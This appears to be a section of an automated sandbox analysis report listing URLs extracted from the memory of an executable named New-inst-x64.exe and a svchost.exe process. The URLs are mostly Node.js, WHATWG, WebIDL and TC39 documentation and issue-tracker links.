      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
      Source: svchost.exe, 00000012.00000003.1402558604.0000020E2E454000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000012.00000003.1402558604.0000020E2E454000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://encoding.spec.whatwg.org
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://fetch.spec.whatwg.org/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/WICG/scheduling-apis
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/acornjs/acorn/issues/575
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/antirez/linenoise
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/chalk/supports-color
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/heycam/webidl/pull/946.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/isaacs/color-support.
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/joyent/node/issues/3295.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/libuv/libuv/pull/1501.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/mafintosh/end-of-stream
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/mafintosh/pump
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/mysticatea/abort-controller
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/10673
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/13435
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/19009
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/2006
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/2119
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/31074
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/3392
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/34532
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/35475
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/35862
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/35981
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/39707
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/39758
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/12342
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/12607
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/21313
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/26334.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/30958
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/32887
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35941
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
